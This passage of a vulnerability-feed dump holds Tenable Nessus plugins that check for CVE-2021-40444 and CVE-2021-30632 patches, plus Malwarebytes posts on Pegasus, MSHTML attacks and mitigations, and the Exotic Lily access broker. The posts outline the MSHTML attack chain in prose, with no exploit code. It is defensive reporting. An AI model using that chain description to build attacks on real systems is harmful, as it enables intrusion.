"#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153374);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"MSKB\", value:\"5005563\");\n script_xref(name:\"MSKB\", value:\"5005606\");\n script_xref(name:\"MSKB\", value:\"5005613\");\n script_xref(name:\"MSKB\", value:\"5005623\");\n script_xref(name:\"MSKB\", value:\"5005633\");\n script_xref(name:\"MSFT\", value:\"MS21-5005563\");\n script_xref(name:\"MSFT\", value:\"MS21-5005606\");\n script_xref(name:\"MSFT\", value:\"MS21-5005613\");\n script_xref(name:\"MSFT\", value:\"MS21-5005623\");\n script_xref(name:\"MSFT\", value:\"MS21-5005633\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Internet Explorer (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a\nmemory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute\narbitrary commands. (CVE-2021-40444)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005563\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005613\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005633\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5005563\n -KB5005606\n -KB5005613\n -KB5005623\n -KB5005633\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-09';\nvar kbs = make_list(\n '5005563',\n '5005606',\n '5005613',\n '5005623',\n '5005633'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar os = get_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar productname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && '8.1' >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.3', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.2', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.1', sp:1, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:'6.0', sp:2, file:'mshtml.dll', version:'9.0.8112.21591', min_version:'9.0.8112.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563')\n)\n{\n var report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5005563 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == '6.3')\n {\n report += ' - KB5005613 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005613', report);\n }\n else if(os == '6.2')\n {\n report += ' - KB5005623 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005623', report);\n }\n else if(os == '6.1')\n {\n report += ' - KB5005633 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005633', report);\n }\n else if(os == '6.0')\n {\n report += ' - KB5005606 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005606', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n var port = kb_smb_transport();\n\n hotfix_security_warning();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:38", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 93.0.961.47. It is, therefore, affected by a vulnerability as referenced in the September 14, 2021 advisory.\n\n - Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-30632)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 93.0.961.47 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-30632"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_93_0_961_47.NASL", "href": "https://www.tenable.com/plugins/nessus/153369", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153369);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-30632\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 93.0.961.47 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 93.0.961.47. It is, therefore, affected\nby a vulnerability as referenced in the September 14, 2021 advisory.\n\n - Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-30632)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#september-14-2021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?78d37aa2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-30632\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 93.0.4577.82 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-30632\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar app_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nvar constraints = [\n { 'fixed_version' : '93.0.961.47' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2021-09-15T08:46:32", "description": "Spyware developed by the company NSO Group is back in the news today after Apple released an emergency fix for iPhones, iPads, Macs, and Apple Watches. The update fixes a vulnerability silently exploited by software called Pegasus, which is often used in [high-level surveillance campaigns](<https://blog.malwarebytes.com/privacy-2/2021/07/pegasus-spyware-has-been-here-for-years-we-must-stop-ignoring-it/>) by governments.\n\n### Zero-day\n\nPegasus spyware is typically installed on victims' phones using a software exploit that requires little or no user interaction\u2014perhaps no more than a click. The exploits change over time, as they are discovered and patched by Apple.\n\nThis most recent exploit is a \u201czero-day, zero-click\u201d flaw in Apple\u2019s iMessage app that requires no user interaction at all. Known as \u201cFORCEDENTRY\u201d, it was [discovered](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) by CitizenLab after a forensic examination of a phone belonging to a Saudi activist.\n\nThe exploit has apparently been in use since at least February 2021, and reportedly works on Apple iOS, MacOS, and WatchOS devices.\n\nWhat should you do next?\n\nPut simply, if you run any of these devices, you must **[update immediately](<https://support.apple.com/en-ca/HT212807>) to iOS 14.8**.\n\nAs per the description:\n\n> _Impact: Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited._\n> \n> _Description: An integer overflow was addressed with improved input validation._\n> \n> _CVE-2021-30860: The Citizen Lab_\n\nIf you want specifics on what exactly is affected, Apple has [said the following](<https://www.techzine.eu/news/security/65408/apple-releases-update-fixing-nso-spyware-vulnerabilities/>):\n\n"All iPhones with iOS versions prior to 14.8, All Mac computers with operating system versions prior to OSX Big Sur 11.6, Security Update 2021-005 Catalina, and all Apple Watches prior to watchOS 7.6.2."\n\n### Pegasus spyware\n\nThe NSO Group says that its spyware is used against criminals and terrorists, but journalists and human rights activists are known to have been targeted by Pegasus attacks, along with political dissidents and business executives at the highest levels. The software can be used to collect all manner of personal data from devices, intercept calls and messages, and much more. If your work is particularly sensitive, it isn\u2019t something you want anywhere near your phone.\n\n### Is the sky falling?\n\nAbsolutely not. It\u2019s very good practice to keep all of your devices updated. It\u2019s something we should be doing by default. Sometimes you may have to do some updating manually to ensure crucial systems don\u2019t break inside whatever daisy-chain of a network you have in operation. Businesses can typically work around this if needed.\n\nFor the most part, you can typically set updates to automatic and deal with them as they come through.\n\nAs far as Pegasus goes though, the vast majority of people will never, ever run into a piece of spyware like it. Pegasus campaigns are expensive, and so are the exploits they use. Campaign owners simply do not care about most people enough to waste valuable resources on them. They _do_ care about defined, specific, known targets in advance, however. This isn\u2019t something which tends to get spammed out to hundreds of thousands of Gmail accounts, or dropped into Discord chat. If you are a high value target\u2014perhaps if you work at a [center for human rights](<https://www.bleepingcomputer.com/news/apple/new-zero-click-iphone-exploit-used-to-deploy-nso-spyware/>)\u2014you _might_ need to ponder the implications of something like Pegasus.\n\nAs Apple itself [explains](<https://www.theguardian.com/technology/2021/sep/13/nso-group-iphones-apple-devices-hack-patch>), these attacks cost \u201cmillions\u201d to develop, have short lifespans, and \u201care not a threat to the overwhelming majority of our users\u201d.\n\nAll the same, you should apply the fix as soon as possible. While you\u2019re almost certainly not at risk from Pegasus, there\u2019s a lot of other bad things out there which do target regular folks and businesses. The danger for most people is that somebody else manages to reverse-engineer this exploit into something that's used more widely.\n\nGrab the update, and go about your business safe in the knowledge that being hit by Pegasus is now even more unlikely than it was previously.\n\nThe post [Apple releases emergency update: Patch, but don't panic](<https://blog.malwarebytes.com/privacy-2/2021/09/apple-releases-emergency-update-patch-but-dont-panic/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-14T11:39:39", "type": "malwarebytes", "title": "Apple releases emergency update: Patch, but don\u2019t panic", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-30860"], "modified": "2021-09-14T11:39:39", "id": "MALWAREBYTES:0A7B79D902F4C3089D6602A5A3520EDF", "href": "https://blog.malwarebytes.com/privacy-2/2021/09/apple-releases-emergency-update-patch-but-dont-panic/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T08:35:08", "description": "Malwarebytes has reason to believe that the [MSHTML vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) listed under [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.\n\nThe first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country's defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia's largest research and development centers for developing rocket and space technology.\n\nThe email claims to come from the Human Resources (HR) department of the organization.\n\n![HR department query](https://blog.malwarebytes.com/wp-content/uploads/2021/09/Makeyev_template-484x600.png)A phishing email targeted at the Makeyev State Rocket Center, posing at its own HR department \n\nIt says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. And that action is enough to trigger the exploit.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nThe second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used to target several interesting targets.\n\n![from Russian Ministry of the Interior](https://blog.malwarebytes.com/wp-content/uploads/2021/09/Justice_template-469x600.png)A phishing email posing as the Russian Ministry of the Interior\n\nThe title of the documents translates to \u201cNotification of illegal activity.\u201d It asks the receiver to please fill out the form and return it to the Ministry of Internal affairs or reply to this email. It also urges the intended victim to do so within 7 days.\n\n### Russian targets\n\nIt is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.\n\n### Patched vulnerability\n\nThe CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn't long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.\n\nMicrosoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a [patch into its recent Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u0441\u0435!\n\nThe post [MSHTML attack targets Russian state rocket centre and interior ministry](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T19:16:56", "type": "malwarebytes", "title": "MSHTML attack targets Russian state rocket centre and interior ministry", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-22T19:16:56", "id": "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "href": "https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-13T12:35:29", "description": "Several researchers have independently reported a 0-day remote code execution vulnerability in MSHTML to Microsoft. The reason it was reported by several researchers probably lies in the fact that a limited number of attacks using this vulnerability have been identified, as per Microsoft\u2019s [security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). \n\n> Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nMSHTML is a software component used to render web pages on Windows. Although it's most commonly associated with Internet Explorer, it is also used in other software including versions of Skype, Microsoft Outlook, Visual Studio, and others.\n\nMalwarebytes, as shown lower in this article, blocks the related malicious powershell code execution.\n\n### CVE-2021-40444\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one has been assigned the designation [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>) and received a CVSS score of 8.8 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\nThe Cybersecurity and Infrastructure Security Agency took to Twitter to [encourage](<https://twitter.com/USCERT_gov/status/1435342618704191491>) users and organizations to review Microsoft's mitigations and workarounds to address CVE-2021-40444.\n\n### ActiveX\n\nBecause MSHTML is the beating heart of Internet Explorer, the vulnerability also exists in that browser. Although given its limited use, there is little risk of infection by that vector. Microsoft Office applications however, use the MSHTML component to display web content in Office documents.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nSo, the attacker will have to trick the user into opening a malicious document. But we all know how good some attackers are at this.\n\n### Mitigation\n\nAt the moment all supported Windows versions are vulnerable. Since there is no patch available yet, Microsoft proposes a few methods to block these attacks.\n\n * Disable the installation of all ActiveX controls in Internet Explorer via the registry. Previously-installed ActiveX controls will still run, but no new ones will be added, including malicious ones.\n * Open documents from the Internet in Protected View or Application Guard for Office, both of which prevent the current attack. This is a default setting but it may have been changed.\n\nDespite the lack of a ready patch, all versions of Malwarebytes currently block this threat, as shown below. Malwarebytes also detects the eventual payload, Cobalt Strike, and has done so for years, meaning that even if a threat actor had disabled anti-exploit, then Cobalt Strike itself would still be detected. \n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/09/MSHTML-1-600x427.png)\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/09/MSHTML-teams-600x371.png)A screenshot from Malwarebytes Teams showing active detection of this threat\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/09/MSHTML-2-600x349.png)A screenshot from Malwarebytes Nebula showing active detection of this threat\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/09/Teams-image-2-600x393.png)A screenshot of Malwarebytes Teams blocking the final payload\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/09/MBAE-image-1-600x419.png)A screenshot of Malwarebytes Anti-Exploit blocking the exploit payload process\n\n### Registry changes\n\nModifying the registry may create unforeseen results, so create a backup before you change it! It may also come in handy when you want to undo the changes at a later point.\n\nTo create a backup, open Regedit and drill down to the key you want to back up (if it exists):\n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones`\n\nRight click the key in the left side of the registry pane and select "Export". Follow the prompts and save the created reg file with a name and in a location where you can easily find it.\n\n![registry export](https://blog.malwarebytes.com/wp-content/uploads/2021/09/exportregistrykey.png)\n\nTo make the recommended changes, open a text file and paste in the following script. Make sure that all of the code box content is pasted into the text file!\n \n \n Windows Registry Editor Version 5.00\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n\nSave the file with a .reg file extension. Right-click the file and select Merge. You'll be prompted about adding the information to the registry, agree, and then reboot your machine.\n\n## Update september 9, 2021\n\nIt has taken researchers only a few days to circumvent the mitigations proposed by Microsoft. Once they were able to find a sample of a malicious Word document, they have started analyzing how it works and along the way poked holes in the defense strategies proposed by Microsoft.\n\nOne of the wobbly pillars is the Mark-of-the-Web (MoTW) flag that is given to downloaded files. This only blocks the exploit unless a user clicks on the 'Enable Editing' buttons. Sadly, experience has learned us that it is not a good idea to trust that they won't do that. Another problem with this flag is that it doesn't survive when it is handled by other applications, like for example, unzipping. Another problem are certain filetypes that use the same MSHTML to view webcontent, but are not protected by Office's Protected View security feature. Researcher [Will Dormann](<https://twitter.com/wdormann/status/1435951560006189060>) was able to replicate the attasck using an RTF file.\n\nThe registry fix we posted to prevent ActiveX controls from running in Internet Explorer, were supposed to effectively block the current attacks. But, security researcher Kevin Beaumont has already [discovered a way](<https://twitter.com/GossiTheDog/status/1435570418623070210>) to bypass Microsoft's current mitigations to exploit this vulnerability.\n\n### The attack chain\n\nThe researchers have also managed to reconstruct the attack chain with the use of a limited set of samples of malicious docx files. \n\n * Once a user clicks on the 'Enable Editing' button, the exploit will load a _side.html_ file by using the mhtml protocol to open a URL. The _side.html _file is hosted at a remote site and will be loaded as a Word template.\n * The Internet Explorer browser will be started to load the HTML, and its obfuscated JavaScript code will exploit the CVE-2021-40444 vulnerability to create a malicious ActiveX control.\n * This ActiveX control will download a _ministry.cab_ file from a remote site.\n * And extract a _championship.inf_ file, which is actually a DLL, and execute it as a CPL file by using rundll32.exe.\n * The ultimate payload is a Cobalt Strike beacon, which would allow the threat actor to gain remote access to the device.\n\nGiven the few days that are left until next patch Tuesday, it is doubtful whether Microsoft will be able to come up with an effective patch.\n\nConsider me one happy camper that Malwarebytes does not rely on the MoTW flag.\n\n![Office Exploit blocked](https://blog.malwarebytes.com/wp-content/uploads/2021/09/ExploitOfficeWMIblock.png)_This is what happened when I tried to "edit" the Word doc the researchers analyzed_\n\n## Update september 13, 2021\n\nAs [reported by BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) threat actors are sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker can follow step-by-step instructions to build their own attacks. Since the method we mentioned that uses an RTF file even works in Windows explorer file previews. This means this vulnerability can be exploited by viewing a malicious document using the Windows Explorer preview feature.\n\nSince this was discovered, Microsoft has added the following mitigation to disable previewing of RTF and Word documents:\n\n 1. In the Registry Editor (regedit.exe), navigate to the appropriate registry key: **For Word documents, navigate to these keys:**\n * HKEY_CLASSES_ROOT.docx\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.doc\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.docm\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} **For rich text files (RTF), navigate to this key:**\n * HKEY_CLASSES_ROOT.rtf\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n 2. Export a copy of the Registry key as a backup.\n 3. Now double-click **Name** and in the **Edit String** dialog box, delete the Value Data.\n 4. Click **OK**,\n\nWord document and RTF file previews are now disabled in Windows Explorer.\n\nTo enable Windows Explorer preview for these documents, double-click on the backup .reg file you created in step 2 above.\n\nStay safe,everyone!\n\nThe post [[updated] Windows MSHTML zero-day actively exploited, mitigations required](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-08T11:04:07", "type": "malwarebytes", "title": "[updated] Windows MSHTML zero-day actively exploited, mitigations required", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T11:04:07", "id": "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-18T23:27:45", "description": "The Google Threat Analysis Group (TAG) has shared their observations about a group of cybercriminals called Exotic Lily. This group has specialized itself as an initial access broker, which means they find a vulnerability in an organization's defenses, exploit that vulnerability, and sell the access to the victim's network to an interested party, several times over with different victims.\n\nAmong these interested parties TAG found the [Conti](<https://blog.malwarebytes.com/threat-spotlight/2021/05/threat-spotlight-conti-the-ransomware-used-in-the-hse-healthcare-attack/>) and Diavol ransomware groups. Because Exotic Lily's methods involved a lot of detail, they are believed to require a level of human interaction that is rather unusual for cybercrime groups focused on large scale operations.\n\n## Initial access broker\n\nLike in any maturing industry, you can expect to see specialization and diversification. Initial access brokers are an example of specialized cybercriminals. They will use a vulnerability to gain initial access, and, probably based on the nature of the target, sell this access to other cybercriminals that can use this access to deploy their specific malware.\n\nThese initial access brokers are different from the usual ransomware affiliates that will deploy the ransomware they are affiliated with themselves and use the infrastructure provided by the ransomware as a service (RaaS) group to get a chunk of the ransom if the victim decides to pay. The RaaS will provide the encryption software, the contact and leak sites, and negotiate the ransom with the victim. An initial access broker will inform another cybercriminal by letting them know they have found a way in at company xyz, and inquire how much they are willing to pay for that access.\n\n## Exotic Lily\n\nFrom the [TAG blog](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) we can learn that Exotic Lily was very much specialized. Their initial attack vector was email. Initially, they were targeting specific industries such as IT, cybersecurity, and healthcare, but that focus has become less stringent.\n\nTheir email campaigns gained credibility by spoofing companies and employees. Their email campaigns were targeted to a degree that they are believed to be sent by real human operators using little to no automation. To evade detection mechanisms they used common services like WeTransfer, TransferNow, and OneDrive to deliver the payload.\n\nLast year, researchers found that Exotic Lily used the vulnerability listed as 